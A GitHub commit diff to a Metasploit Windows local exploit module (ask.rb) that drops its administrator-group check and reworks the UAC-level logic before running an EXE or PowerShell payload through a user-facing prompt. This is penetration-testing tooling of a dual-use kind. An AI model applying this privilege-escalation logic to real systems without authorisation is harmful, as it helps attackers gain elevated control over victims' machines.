Skip to content

Commit 04506d7

Browse files
committed
Dont check for admin
1 parent 868b70c commit 04506d7

File tree

1 file changed

+11
-35
lines changed
  • modules/exploits/windows/local

1 file changed

+11
-35
lines changed

modules/exploits/windows/local/ask.rb

Lines changed: 11 additions & 35 deletions
Original file line numberDiff line numberDiff line change
@@ -45,53 +45,29 @@ def initialize(info={})
4545

4646
end
4747

48-
def check
49-
session.readline
50-
print_status('Checking admin status...')
51-
admin_group = is_in_admin_group?
52-
if admin_group.nil?
53-
print_error('Either whoami is not there or failed to execute')
54-
print_error('Continuing under assumption you already checked...')
55-
return Exploit::CheckCode::Unknown
56-
else
57-
if admin_group
58-
print_good('Part of Administrators group! Continuing...')
59-
return Exploit::CheckCode::Vulnerable
60-
else
61-
print_error("Not in admins group, cannot escalate with this module")
62-
return Exploit::CheckCode::Safe
63-
end
64-
end
65-
end
66-
6748
def exploit
68-
admin_check = check
69-
if admin_check.join =~ /safe/
70-
fail_with(Exploit::Failure::NoAccess, "Not in admins group, cannot escalate with this module")
71-
end
49+
7250
if is_uac_enabled?
7351
print_status "UAC is Enabled, checking level..."
74-
else
75-
if is_in_admin_group?
76-
fail_with(Exploit::Failure::Unknown, "UAC is disabled and we are in the admin group so something has gone wrong...")
77-
else
78-
fail_with(Exploit::Failure::NoAccess, "Not in admins group, cannot escalate with this module")
79-
end
80-
end
81-
case get_uac_level
52+
case get_uac_level
8253
when UAC_NO_PROMPT
8354
print_good "UAC is not enabled, no prompt for the user"
8455
else
8556
print_status "The user will be prompted, wait for them to click 'Ok'"
57+
end
58+
else
59+
print_good "UAC is not enabled, no prompt for the user"
8660
end
61+
8762
#
8863
# Generate payload and random names for upload
8964
#
9065
case datastore["TECHNIQUE"]
91-
when "EXE"
92-
execute_exe(datastore["FILENAME"],datastore["PATH"],datastore["UPLOAD"])
93-
when "PSH"
94-
execute_psh
66+
when "EXE"
67+
execute_exe(datastore["FILENAME"],datastore["PATH"],datastore["UPLOAD"])
68+
when "PSH"
69+
execute_psh
9570
end
9671
end
9772
end
73+

0 commit comments

Comments
 (0)